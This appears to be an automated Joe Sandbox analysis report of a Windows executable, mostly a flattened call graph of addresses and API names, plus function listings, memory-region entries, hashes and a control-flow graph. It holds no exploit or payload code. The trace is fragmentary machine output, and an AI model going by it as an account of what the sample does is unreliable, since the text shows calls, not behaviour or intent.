lstrcpy lstrcpy 111008->111229 111517 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 111009->111517 111011->111009 111035 4a1b40 2 API calls 111011->111035 111011->111052 111269 49b850 GlobalFree GlobalFree lstrcpy 111012->111269 111232 49b850 GlobalFree GlobalFree lstrcpy 111013->111232 111044 49ddbf 111014->111044 111273 49b850 GlobalFree GlobalFree lstrcpy 111014->111273 111048 49de1f 111015->111048 111276 49b850 GlobalFree GlobalFree lstrcpy 111015->111276 111279 49cb80 185 API calls ___free_lc_time 111016->111279 111265 49bc90 187 API calls 111017->111265 111271 49bf20 277 API calls 111018->111271 111019 49dc60 111230 49a580 40 API calls 111019->111230 111026 49e819 111518 49a580 40 API calls 111026->111518 111027 49dd11 111266 49d420 TlsGetValue 111027->111266 111029 49dd5d 111062 49dd64 111029->111062 111270 49b0b0 280 API calls 111029->111270 111030 49dd81 111272 49d420 TlsGetValue 111030->111272 111031 49dcac 111042 49dcb3 111031->111042 111233 49af10 TlsGetValue 111031->111233 111032 49de6c 111280 49d420 TlsGetValue 111032->111280 111045 49ded9 lstrlen 111035->111045 111039 49dc6b 111231 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111039->111231 111262 49d420 TlsGetValue 111042->111262 111044->111062 111274 49c7f0 175 API calls ___free_lc_time 111044->111274 111045->111009 111045->111052 111046 49e824 111519 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111046->111519 111047 49dd25 111267 4a07d0 23 API calls 111047->111267 111050 49de26 111048->111050 111277 49c910 176 API calls ___free_lc_time 111048->111277 111278 49d420 TlsGetValue 111050->111278 111052->111009 111053 49dfa2 111052->111053 111073 4a1b40 2 API calls 111052->111073 111056 49e350 111053->111056 111086 49dfd5 111053->111086 111054 49dd95 111281 4a07d0 23 API calls 111054->111281 111068 49e35a 111056->111068 111069 49e516 111056->111069 111061 49dc71 111061->110861 111275 49d420 TlsGetValue 111062->111275 111064 49dcdb 111263 4a07d0 23 API calls 111064->111263 111065 49e830 111065->110861 111066 49dd33 111268 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111066->111268 111068->111009 111074 49e36e 111068->111074 111492 49b0b0 280 API calls 111069->111492 111070 49de8e 111282 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111070->111282 111081 49df89 111073->111081 111075 49af10 177 API calls 111074->111075 111082 49e378 111075->111082 111078 49e086 111317 49d420 TlsGetValue 111078->111317 111079 49dd3f 111079->110861 111080 49e520 111087 49e569 111080->111087 111088 49e529 111080->111088 111283 4a2110 CharNextA lstrlen 111081->111283 111090 49e3b1 111082->111090 111091 49e381 111082->111091 111083 49de9a 111083->110861 111084 49dce9 111264 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111084->111264 111085 49e1a4 111104 4af0b8 ___free_lc_time 29 API calls 111085->111104 111086->111078 111086->111085 111105 4af1a1 ctype 29 API calls 111086->111105 111141 49e0ea 111086->111141 111095 49e575 111087->111095 111130 49e5c3 111087->111130 111493 49d420 TlsGetValue 111088->111493 111101 49e3be 111090->111101 111142 49e40c 111090->111142 111321 49d420 TlsGetValue 111091->111321 111496 49d420 TlsGetValue 111095->111496 111096 49df8f 111096->111053 111098 49df96 lstrcat 111096->111098 111098->111053 111323 49d420 TlsGetValue 111101->111323 111102 49dcf5 111102->110861 111103 49e5fa 111199 49e629 111103->111199 111501 4a18a0 TlsGetValue wsprintfA CreateProcessA WaitForInputIdle EnumWindows 111103->111501 111104->111078 111105->111141 111106 49e2fd 111113 49e321 111106->111113 111120 49e30d 111106->111120 111107 49e53b 111494 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111107->111494 111108 49e587 111497 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 111108->111497 111109 49e29b 111298 49d0d0 TlsGetValue 111109->111298 111110 49e393 111322 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111110->111322 111112 49e46f 111124 49e493 111112->111124 111330 4a18a0 TlsGetValue wsprintfA CreateProcessA WaitForInputIdle EnumWindows 111112->111330 111319 4a07d0 23 API calls 111113->111319 111118 49e3d0 111324 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 111118->111324 111318 49a580 40 API calls 111120->111318 111121 49e6f1 111132 49e77a 111121->111132 111511 4a19d0 10 API calls 111121->111511 111123 49e547 111495 49a580 40 API calls 111123->111495 111331 49e980 TlsGetValue 111124->111331 111126 49e597 111127 49e2a5 111138 49e2bc 111127->111138 111148 4af0b8 ___free_lc_time 29 API calls 111127->111148 111128 49e39f 111128->110861 111130->111103 111500 4a1d60 13 API calls 111130->111500 111133 49e31c 111320 49e900 TlsGetValue CloseHandle TlsGetValue CloseHandle 111133->111320 111138->111085 111157 4af0b8 ___free_lc_time 29 API calls 111138->111157 111141->111078 111141->111085 111284 49f670 TlsGetValue 111141->111284 111142->111112 111327 4a1d60 13 API calls 111142->111327 111148->111138 111150 49e5ee 111150->111103 111159 49e43f 111150->111159 111157->111085 111328 49fe00 25 API calls 111159->111328 111160 49e437 111160->111112 111160->111159 111161 49e6f8 111162 49e33e 111162->110861 111178 49e682 wsprintfA 111197 49e980 347 API calls 111197->111199 111199->111121 111199->111161 111199->111197 111201 49e74a 111199->111201 111502 49bf20 277 API calls 111199->111502 111503 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 111199->111503 111509 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 111201->111509 111205->110875 111206->110875 111207->110946 111208->110953 111209->110965 111210->110969 111211->110966 111212->110971 111213->110975 111214->110986 111215->110984 111216->110978 111217->110981 111218->110993 111220 49dc05 lstrcpy 111219->111220 111221 4a1b4e 111219->111221 111220->111006 111221->111220 111222 4a1b70 IsDBCSLeadByte 111221->111222 111223 4a1b84 CharNextA 111221->111223 111222->111221 111222->111223 111223->111220 111223->111221 111225 49acc8 111224->111225 111226 49acc3 111224->111226 111520 49ac70 TlsGetValue 111225->111520 111226->111007 111229->111019 111230->111039 111231->111061 111232->111031 111234 49af37 111233->111234 111235 49af27 111233->111235 111236 49f670 77 API calls 111234->111236 111235->111042 111237 49af49 111236->111237 111238 49af79 111237->111238 111239 49af52 111237->111239 111526 49f810 TlsGetValue 111238->111526 111524 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 111239->111524 111242 49af7f 111245 49af98 111242->111245 111246 49aff7 111242->111246 111243 49af63 111525 49a580 40 API calls 111243->111525 111247 49af6d 111247->111042 111262->111064 111263->111084 111264->111102 111265->111027 111266->111047 111267->111066 111268->111079 111269->111029 111270->111062 111271->111030 111272->111054 111273->111044 111274->111062 111275->111064 111276->111048 111277->111050 111278->111064 111279->111032 111280->111054 111281->111070 111282->111083 111283->111096 111285 49f7d7 111284->111285 111286 49f68c 111284->111286 111285->111109 111287 49f698 lstrcpy lstrcpy 111286->111287 111288 49f797 111286->111288 111290 49ad00 70 API calls 111287->111290 111289 4af1a1 ctype 29 API calls 111288->111289 111291 49f7c7 111289->111291 111292 49f725 111290->111292 111293 4af1a1 ctype 29 API calls 111291->111293 111294 49f729 111292->111294 111295 49f753 lstrcmpiA 111292->111295 111293->111285 111294->111109 111296 49f76b 111295->111296 111296->111288 111620 49b850 GlobalFree GlobalFree lstrcpy 111296->111620 111299 49d0e8 111298->111299 111300 49d0f4 111298->111300 111299->111127 111301 4a2ed0 2 API calls 111300->111301 111304 49d1be 111300->111304 111302 49d191 ReadFile 111301->111302 111302->111304 111306 49d1ef 111302->111306 111303 49d2fa 111307 49d313 111303->111307 111311 49d320 111303->111311 111313 49d36a 111303->111313 111304->111303 111304->111306 111621 49d050 48 API calls 111304->111621 111306->111127 111307->111311 111313->111127 111317->111106 111318->111133 111319->111133 111320->111162 111321->111110 111322->111128 111323->111118 111327->111160 111330->111124 111624 4a1860 GetWindowThreadProcessId 111330->111624 111492->111080 111493->111107 111494->111123 111496->111108 111497->111126 111500->111150 111501->111199 111660 4a1860 GetWindowThreadProcessId 111501->111660 111502->111199 111503->111178 111511->111132 111517->111026 111518->111046 111519->111065 111521 49ac9f CreateFileA 111520->111521 111522 49ac83 111520->111522 111521->111007 111522->111521 111523 49ac8e CloseHandle 111522->111523 111523->111521 111524->111243 111525->111247 111527 49f828 111526->111527 111528 49f832 111526->111528 111527->111242 111529 49f83a 111528->111529 111555 49a7b0 TlsGetValue 111528->111555 111529->111242 111556 49aa08 111555->111556 111557 49a7d3 111555->111557 111620->111288 111621->111303 111661->110881 111662->110889 111663->110889 111664->110892 111665->110889 111825 4b62f4 ctype 29 API calls 111824->111825 111829 4b52e6 111825->111829 111826 4b534a 111834 4b6355 RtlLeaveCriticalSection 111826->111834 111829->111826 111831 4b5358 111829->111831 111833 4b830f 9 API calls _wctomb_s 111829->111833 111830 4b5351 111830->110046 111835 4b6355 RtlLeaveCriticalSection 111831->111835 111833->111829 111834->111830 111835->111830 111836->110235 111837 479178 111842 479182 111837->111842 111843 4791da __EH_prolog 111842->111843 111849 4d3de1 111843->111849 111845 4791f2 111859 46d587 111845->111859 111850 4d3deb __EH_prolog 111849->111850 111893 4d3aa8 111850->111893 111853 4d3e11 111855 4d373b ctype 28 API calls 111853->111855 111856 4d3e1f 111855->111856 111857 4d4878 ctype 21 API calls 111856->111857 111858 4d3e31 GetCurrentThread GetCurrentThreadId 111857->111858 111858->111845 111860 46d591 __EH_prolog 111859->111860 111899 473444 111860->111899 111862 46d5c3 111989 46d05f 111862->111989 111864 46d60e 111997 416514 111864->111997 111894 4d3ab2 __EH_prolog 111893->111894 111898 4d3ae5 GetCursorPos 111894->111898 111896 4d3ad6 111896->111853 111897 4b5ac3 29 API calls 2 library calls 111896->111897 111897->111853 111898->111896 111900 47344e __EH_prolog 111899->111900 112027 488b30 111900->112027 111902 473470 112033 488780 111902->112033 111914 4734af 112083 421e93 111914->112083 111986 4735de 112215 441ab4 111986->112215 111988 4735e6 111988->111862 111990 46d069 __EH_prolog 111989->111990 112445 47f919 111990->112445 111994 46d0b2 112453 46d22f 111994->112453 111998 41651e __EH_prolog 111997->111998 111999 4c4290 ctype 32 API calls 111998->111999 112000 416559 111999->112000 112001 47a500 112000->112001 112002 47a50a __EH_prolog 112001->112002 112296 4889b0 130 API calls ctype 112027->112296 112029 488b84 112029->111902 112030 488b38 ctype 112030->112029 112297 488cb0 130 API calls ctype 112030->112297 112032 488b7d 112032->111902 112298 4887d0 112033->112298 112037 48879d 112341 481830 112037->112341 112040 4815f0 130 API calls 112041 4887ae 112040->112041 112042 481930 130 API calls 112041->112042 112043 473487 112042->112043 112044 487680 112043->112044 112045 4830d0 130 API calls 112044->112045 112046 47348f 112045->112046 112047 485b60 112046->112047 112048 4830d0 130 API calls 112047->112048 112049 485b77 112048->112049 112050 4815a0 130 API calls 112049->112050 112051 485b84 112050->112051 112052 481930 130 API calls 112051->112052 112053 485b9c 112052->112053 112054 4815a0 130 API calls 112053->112054 112055 485ba9 112054->112055 112056 481690 130 API calls 112055->112056 112057 485bb6 112056->112057 112058 481930 130 API calls 112057->112058 112059 473497 112058->112059 112060 4854b0 112059->112060 112061 4830d0 130 API calls 112060->112061 112062 47349f 112061->112062 112063 484c80 112062->112063 112064 4830d0 130 API calls 112063->112064 112065 484c97 112064->112065 112393 484d50 112065->112393 112067 484c9d 112068 4830d0 130 API calls 112067->112068 112069 484cb7 112068->112069 112402 484d00 112069->112402 112072 484d00 130 API calls 112073 484ce1 112072->112073 112074 484d00 130 API calls 112073->112074 112075 4734a7 112074->112075 112076 483870 112075->112076 112077 4815f0 130 API calls 112076->112077 112078 483880 112077->112078 112079 481690 130 API calls 112078->112079 112080 48388d 112079->112080 112081 481930 130 API calls 112080->112081 112082 483898 112081->112082 112082->111914 112084 4830d0 130 API calls 112083->112084 112085 421f15 112084->112085 112086 41f237 112085->112086 112087 4830d0 130 API calls 112086->112087 112088 41f343 112087->112088 112089 422100 112088->112089 112090 4830d0 130 API calls 112089->112090 112091 42219e 112090->112091 112092 425297 112091->112092 112093 4830d0 130 API calls 112092->112093 112094 4252c5 112093->112094 112095 4254b7 112094->112095 112096 4830d0 130 API calls 112095->112096 112097 425539 112096->112097 112098 42734b 112097->112098 112099 4830d0 130 API calls 112098->112099 112100 42750b 112099->112100 112101 42b009 112100->112101 112102 4830d0 130 API calls 112101->112102 112103 42b099 112102->112103 112104 42bfe6 112103->112104 112105 4830d0 130 API calls 112104->112105 112106 42c05a 112105->112106 112107 42c7da 112106->112107 112108 4830d0 130 API calls 112107->112108 112109 42c9ae 112108->112109 112110 42e129 112109->112110 112111 4830d0 130 API calls 112110->112111 112112 42e3c5 112111->112112 112113 431b96 112112->112113 112114 4830d0 130 API calls 112113->112114 112115 431c42 112114->112115 112116 4349af 112115->112116 112117 4830d0 130 API calls 112116->112117 112118 434a07 112117->112118 112119 435d20 112118->112119 112120 4830d0 130 API calls 112119->112120 112121 435e04 112120->112121 112122 436b82 112121->112122 112123 4830d0 130 API calls 112122->112123 112124 436d1a 112123->112124 112125 438e41 112124->112125 112126 4830d0 130 API calls 112125->112126 112127 438fc5 112126->112127 112128 43b3a3 112127->112128 112129 4830d0 130 API calls 112128->112129 112130 43b409 112129->112130 112131 43b93b 112130->112131 112132 4830d0 130 API calls 112131->112132 112133 43b993 112132->112133 112134 43d0b0 112133->112134 112135 4830d0 130 API calls 112134->112135 112136 43d194 112135->112136 112137 432605 112136->112137 112138 4830d0 130 API calls 112137->112138 112139 4326e9 112138->112139 112140 434600 112139->112140 112141 4830d0 130 API calls 112140->112141 112142 434666 112141->112142 112143 426185 112142->112143 112144 4830d0 130 API calls 112143->112144 112145 4261c1 112144->112145 112146 435aa8 112145->112146 112147 4830d0 130 API calls 112146->112147 112148 435ae4 112147->112148 112149 43322b 112148->112149 112150 4830d0 130 API calls 112149->112150 112151 433275 112150->112151 112152 424f62 112151->112152 112153 4830d0 130 API calls 112152->112153 112154 424f9e 112153->112154 112155 423773 112154->112155 112156 4830d0 130 API calls 112155->112156 112157 4237af 112156->112157 112158 41ffa8 112157->112158 112159 4830d0 130 API calls 112158->112159 112160 420038 112159->112160 112161 424880 112160->112161 112162 4830d0 130 API calls 112161->112162 112163 424910 112162->112163 112164 423aa5 112163->112164 112165 4830d0 130 API calls 112164->112165 112166 423ae1 112165->112166 112167 423d94 112166->112167 112168 4830d0 130 API calls 112167->112168 112169 423e5c 112168->112169 112170 473197 112169->112170 112171 4830d0 130 API calls 112170->112171 112172 4731d3 112171->112172 112173 433670 112172->112173 112174 4830d0 130 API calls 112173->112174 112175 4336f2 112174->112175 112176 431385 112175->112176 112177 4830d0 130 API calls 112176->112177 112178 4313eb 112177->112178 112179 43e1ec 112178->112179 112180 4830d0 130 API calls 112179->112180 112181 43e28a 112180->112181 112182 43da4c 112181->112182 112183 4830d0 130 API calls 112182->112183 112184 43da96 112183->112184 112185 43bfe2 112184->112185 112186 4830d0 130 API calls 112185->112186 112187 43c064 112186->112187 112188 420ad5 112187->112188 112189 4830d0 130 API calls 112188->112189 112190 420b93 112189->112190 112191 4815f0 130 API calls 112190->112191 112192 420b9a 112191->112192 112193 481770 130 API calls 112192->112193 112194 420ba5 112193->112194 112195 4815f0 130 API calls 112194->112195 112196 420c69 112194->112196 112197 420bc4 112195->112197 112196->111986 112198 481930 130 API calls 112197->112198 112199 420bd9 112198->112199 112200 4815f0 130 API calls 112199->112200 112201 420be4 112200->112201 112202 481930 130 API calls 112201->112202 112203 420bfd 112202->112203 112204 4815f0 130 API calls 112203->112204 112205 420c08 112204->112205 112206 481930 130 API calls 112205->112206 112207 420c21 112206->112207 112208 4815f0 130 API calls 112207->112208 112209 420c2c 112208->112209 112210 481930 130 API calls 112209->112210 112211 420c45 112210->112211 112212 4815f0 130 API calls 112211->112212 112213 420c50 112212->112213 112214 481930 130 API calls 112213->112214 112214->112196 112216 4830d0 130 API calls 112215->112216 112217 441bad 112216->112217 112218 4815f0 130 API calls 112217->112218 112219 441bb4 112218->112219 112220 481770 130 API calls 112219->112220 112221 441bbf 112220->112221 112222 4815f0 130 API calls 112221->112222 112223 441e4c 112221->112223 112224 441bde 112222->112224 112223->111988 112225 4815f0 130 API calls 112224->112225 112226 441be9 112225->112226 112227 481930 130 API calls 112226->112227 112228 441bf3 112227->112228 112229 4815f0 130 API calls 112228->112229 112230 441bfe 112229->112230 112231 481930 130 API calls 112230->112231 112232 441c13 112231->112232 112233 4815f0 130 API calls 112232->112233 112234 441c1e 112233->112234 112235 481930 130 API calls 112234->112235 112236 441c37 112235->112236 112237 4815f0 130 API calls 112236->112237 112238 441c42 112237->112238 112239 481930 130 API calls 112238->112239 112240 441c5b 112239->112240 112241 4815f0 130 API calls 112240->112241 112242 441c66 112241->112242 112243 481930 130 API calls 112242->112243 112244 441c7f 112243->112244 112245 4815f0 130 API calls 112244->112245 112246 441c8a 112245->112246 112247 481930 130 API calls 112246->112247 112248 441ca3 112247->112248 112249 4815f0 130 API calls 112248->112249 112250 441cae 112249->112250 112251 481930 130 API calls 112250->112251 112252 441cc7 112251->112252 112253 4815f0 130 API calls 112252->112253 112254 441cd2 112253->112254 112255 481930 130 API calls 112254->112255 112256 441cec 112255->112256 112257 4815f0 130 API calls 112256->112257 112258 441cf7 112257->112258 112259 481930 130 API calls 112258->112259 112260 441d10 112259->112260 112261 4815f0 130 API calls 112260->112261 112262 441d1b 112261->112262 112263 481930 130 API calls 112262->112263 112264 441d34 112263->112264 112265 4815f0 130 API calls 112264->112265 112266 441d3f 112265->112266 112267 481930 130 API calls 112266->112267 112268 441d58 112267->112268 112269 4815f0 130 API calls 112268->112269 112270 441d63 112269->112270 112271 481930 130 API calls 112270->112271 112272 441d7c 112271->112272 112273 4815f0 130 API calls 112272->112273 112274 441d87 112273->112274 112275 481930 130 API calls 112274->112275 112276 441da0 112275->112276 112277 4815f0 130 API calls 112276->112277 112296->112030 112297->112032 112299 4815a0 130 API calls 112298->112299 112300 4887e2 112299->112300 112301 4830d0 130 API calls 112300->112301 112302 4887fc 112301->112302 112303 4815a0 130 API calls 112302->112303 112304 488809 112303->112304 112305 4815a0 130 API calls 112304->112305 112306 488816 112305->112306 112347 481960 112306->112347 112309 4815a0 130 API calls 112310 48882e 112309->112310 112311 481830 130 API calls 112310->112311 112312 488834 112311->112312 112313 4815a0 130 API calls 112312->112313 112314 488851 112313->112314 112315 4815a0 130 API calls 112314->112315 112316 48885e 112315->112316 112317 481960 130 API calls 112316->112317 112318 488866 112317->112318 112351 481690 112318->112351 112321 481960 130 API calls 112322 48887e 112321->112322 112323 481960 130 API calls 112322->112323 112324 48878b 112323->112324 112325 4830d0 112324->112325 112326 4830e3 112325->112326 112334 48312c 112325->112334 112328 4815f0 130 API calls 112326->112328 112327 4831a3 112327->112037 112329 4830ea 112328->112329 112330 481770 130 API calls 112329->112330 112333 4830f5 112330->112333 112331 4815f0 130 API calls 112331->112334 112332 481690 130 API calls 112332->112334 112333->112334 112336 481830 130 API calls 112333->112336 112334->112327 112334->112331 112334->112332 112335 481930 130 API calls 112334->112335 112335->112334 112337 483112 112336->112337 112338 4815f0 130 API calls 112337->112338 112339 483119 112338->112339 112340 481930 130 API calls 112339->112340 112340->112334 112342 481843 112341->112342 112345 481849 112341->112345 112382 489da0 130 API calls ctype 112342->112382 112375 48cfc0 112345->112375 112348 481971 112347->112348 112349 48d2c0 ctype 130 API calls 112348->112349 112350 481982 112349->112350 112350->112309 112352 4816a9 112351->112352 112353 4816a3 112351->112353 112357 48ca30 112352->112357 112360 489da0 130 API calls ctype 112353->112360 112356 4816b7 112356->112321 112361 48dd50 112357->112361 112359 48ca4c ctype 112359->112356 112360->112352 112362 48dd9c 112361->112362 112363 48dd5f 112361->112363 112366 48dda1 112362->112366 112367 48ddb5 112362->112367 112364 48dd6b GetProcessHeap HeapFree 112363->112364 112365 48dd7d 112363->112365 112364->112365 112365->112359 112373 482a80 130 API calls ctype 112366->112373 112369 48ddce GetProcessHeap RtlReAllocateHeap 112367->112369 112370 48ddbe GetProcessHeap RtlAllocateHeap 112367->112370 112371 48ddde 112369->112371 112370->112371 112371->112365 112374 488da0 33 API calls ctype 112371->112374 112373->112365 112376 48dd50 ctype 130 API calls 112375->112376 112377 48cfd3 ctype 112376->112377 112383 48d020 112377->112383 112381 48185f 112381->112040 112382->112345 112384 48dd50 ctype 130 API calls 112383->112384 112385 48d003 112384->112385 112386 48d080 112385->112386 112387 48d098 112386->112387 112388 48d0a3 112386->112388 112392 482a80 130 API calls ctype 112387->112392 112390 48dd50 ctype 130 API calls 112388->112390 112391 48d0b4 112388->112391 112390->112391 112391->112381 112391->112391 112392->112388 112413 482cf0 112393->112413 112395 484d60 112396 4815a0 130 API calls 112395->112396 112397 484d6d 112396->112397 112398 481960 130 API calls 112397->112398 112399 484d7d 112398->112399 112400 4830d0 130 API calls 112399->112400 112401 484d8c 112400->112401 112401->112067 112403 4815f0 130 API calls 112402->112403 112404 484d10 112403->112404 112427 483ce0 112404->112427 112406 484d16 112407 484d3e 112406->112407 112409 4815f0 130 API calls 112406->112409 112408 481930 130 API calls 112407->112408 112410 484ccc 112408->112410 112411 484d2e 112409->112411 112410->112072 112412 481930 130 API calls 112411->112412 112412->112407 112414 4815f0 130 API calls 112413->112414 112416 482d01 112414->112416 112415 482d1b 112415->112395 112416->112415 112417 481830 130 API calls 112416->112417 112418 482d2e 112417->112418 112419 4815f0 130 API calls 112418->112419 112420 482d35 112419->112420 112421 481960 130 API calls 112420->112421 112422 482d48 112421->112422 112423 4815f0 130 API calls 112422->112423 112424 482d57 112423->112424 112425 481960 130 API calls 112424->112425 112426 482d62 112425->112426 112426->112395 112432 481d30 112427->112432 112431 483d01 112431->112406 112433 481d42 112432->112433 112436 481d48 112432->112436 112444 489da0 130 API calls ctype 112433->112444 112441 48c9f0 112436->112441 112438 482d70 112439 4815f0 130 API calls 112438->112439 112440 482d80 112439->112440 112440->112431 112442 48dd50 ctype 130 API calls 112441->112442 112443 481d56 112442->112443 112443->112438 112444->112436 112446 47f923 __EH_prolog 112445->112446 112472 47f99c 112446->112472 112449 47e819 112450 47e823 __EH_prolog 112449->112450 112475 47e8b7 112450->112475 112480 46d48f 112453->112480 112455 46d27f 112456 47f99c 35 API calls 112455->112456 112458 46d287 112456->112458 112461 47e8b7 35 API calls 112458->112461 112459 46d23a 112462 46d25f 112459->112462 112506 4c3f7e 29 API calls ctype 112459->112506 112463 46d28f 112461->112463 112462->112455 112507 4c3f7e 29 API calls ctype 112462->112507 112500 4c4290 112463->112500 112466 4c6033 ctype 35 API calls 112467 46d2b0 112466->112467 112468 4c6033 ctype 35 API calls 112467->112468 112469 46d2cc 112468->112469 112470 4c6033 ctype 35 API calls 112469->112470 112471 46d0f5 112470->112471 112471->111864 112473 4c6033 ctype 35 API calls 112472->112473 112474 46d0a6 112473->112474 112474->112449 112476 4c6033 ctype 35 API calls 112475->112476 112477 47e8c7 112476->112477 112478 4c6033 ctype 35 API calls 112477->112478 112479 47e84d 112478->112479 112479->111994 112486 46d499 __EH_prolog 112480->112486 112481 46d4c4 112482 4c5f18 ctype 67 API calls 112481->112482 112483 46d4d2 112482->112483 112508 46d552 112483->112508 112486->112481 112512 4c3f7e 29 API calls ctype 112486->112512 112488 4c5eaa ctype 32 API calls 112489 46d4f5 112488->112489 112490 46d543 112489->112490 112513 4c512e 29 API calls ctype 112489->112513 112490->112459 112492 46d500 112493 46d516 112492->112493 112514 40e166 35 API calls 2 library calls 112492->112514 112493->112490 112495 4c6033 ctype 35 API calls 112493->112495 112496 46d52d 112495->112496 112497 4c6033 ctype 35 API calls 112496->112497 112498 46d53a 112497->112498 112515 4c4661 29 API calls ctype 112498->112515 112501 4c429a 112500->112501 112502 4c42aa 112501->112502 112504 4c5eaa ctype 32 API calls 112501->112504 112517 4c3be1 112502->112517 112504->112501 112506->112459 112507->112462 112509 46d557 112508->112509 112510 46d4e1 112509->112510 112516 4afa15 44 API calls 2 library calls 112509->112516 112510->112488 112512->112486 112513->112492 112514->112493 112515->112490 112516->112509 112518 4c3be5 112517->112518 112519 46d29a 112517->112519 112518->112519 112521 4c5157 29 API calls ___free_lc_time 112518->112521 112519->112466 112521->112518

                                                                                  Executed Functions

                                                                                  Function 0049E980 Relevance: 104.2, APIs: 58, Strings: 1, Instructions: 941stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000001C,?), ref: 0049E9B0
                                                                                  • lstrcat.KERNEL32(?,00510870), ref: 0049EA24
                                                                                  • lstrcpy.KERNEL32(0000075E,?), ref: 0049EA7D
                                                                                  • CharNextA.USER32(?), ref: 0049EA9A
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 0049EAB1
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 0049EAE0
                                                                                  • lstrcat.KERNEL32(0000075E,?), ref: 0049EAF0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrcat$CharNextValue
                                                                                  • String ID: 1
                                                                                  • API String ID: 89198350-2212294583
                                                                                  • Opcode ID: ad68a6ee470f24b43202929697fe6708f043ebdbb7c53b38e45a62e054b4148b
                                                                                  • Instruction ID: ac321c7f4d244bd38f1624eaa5a46420c787ebbff42c379b791db125affa82a7
                                                                                  • Opcode Fuzzy Hash: ad68a6ee470f24b43202929697fe6708f043ebdbb7c53b38e45a62e054b4148b
                                                                                  • Instruction Fuzzy Hash: B672E2716003459BEB30DB65DC81FEBB7E8AB94304F04493EE549C7282E779E909CB5A
                                                                                  Function 004B967E Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 207timeCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1174 4b967e-4b96b9 call 4b62f4 call 4b30af 1179 4b96bf-4b96d5 call 4b6355 GetTimeZoneInformation 1174->1179 1180 4b97bc-4b97bf 1174->1180 1190 4b96db-4b96fe 1179->1190 1191 4b9900-4b9904 1179->1191 1182 4b98f9-4b98ff call 4b6355 1180->1182 1183 4b97c5-4b97cc 1180->1183 1182->1191 1186 4b97df-4b9801 call 4af0b8 call 4afc60 call 4af1a1 1183->1186 1187 4b97ce-4b97d9 call 4b0bc0 1183->1187 1186->1182 1209 4b9807-4b9834 call 4b13e0 call 4b6355 call 4b12e0 1186->1209 1187->1182 1187->1186 1194 4b970c-4b9713 1190->1194 1195 4b9700-4b9707 1190->1195 1197 4b9730-4b9736 1194->1197 1198 4b9715-4b971c 1194->1198 1195->1194 1201 4b973c-4b9766 WideCharToMultiByte 1197->1201 1198->1197 1200 4b971e-4b972e 1198->1200 1200->1201 1203 4b9778-4b977d 1201->1203 1204 4b9768-4b976b 1201->1204 1208 4b9780-4b979f WideCharToMultiByte 1203->1208 1204->1203 1206 4b976d-4b9776 1204->1206 1206->1208 1210 4b98ef-4b98f7 1208->1210 1211 4b97a5-4b97a8 1208->1211 1219 4b983e-4b984f call 4b020d 1209->1219 1220 4b9836-4b983d 1209->1220 1210->1191 1211->1210 1213 4b97ae-4b97b7 1211->1213 1213->1191 1223 4b9855-4b9859 1219->1223 1220->1219 1224 4b985b-4b985d 1223->1224 1225 4b9863-4b9864 1223->1225 1226 4b985f-4b9861 1224->1226 1227 4b9866-4b9869 1224->1227 1225->1223 1226->1225 1226->1227 1228 4b986b-4b987e call 4b020d 1227->1228 1229 4b98b9-4b98bd 1227->1229 1236 4b9884-4b9888 1228->1236 1230 4b98bf-4b98c1 1229->1230 1231 4b98c7-4b98d1 1229->1231 1230->1231 1231->1210 1233 4b98d3-4b98ed call 4b12e0 1231->1233 1233->1191 1238 4b988a-4b988c 1236->1238 1239 4b9891-4b9894 1236->1239 1238->1239 1240 4b988e-4b988f 1238->1240 1239->1229 1241 4b9896-4b98a6 call 4b020d 1239->1241 1240->1236 1244 4b98ac-4b98b0 1241->1244 1244->1229 1245 4b98b2-4b98b4 1244->1245 1245->1229 1246 4b98b6-4b98b7 1245->1246 1246->1244
                                                                                  APIs
                                                                                    • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                    • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                    • Part of subcall function 004B6355: RtlLeaveCriticalSection.NTDLL ref: 004B6362
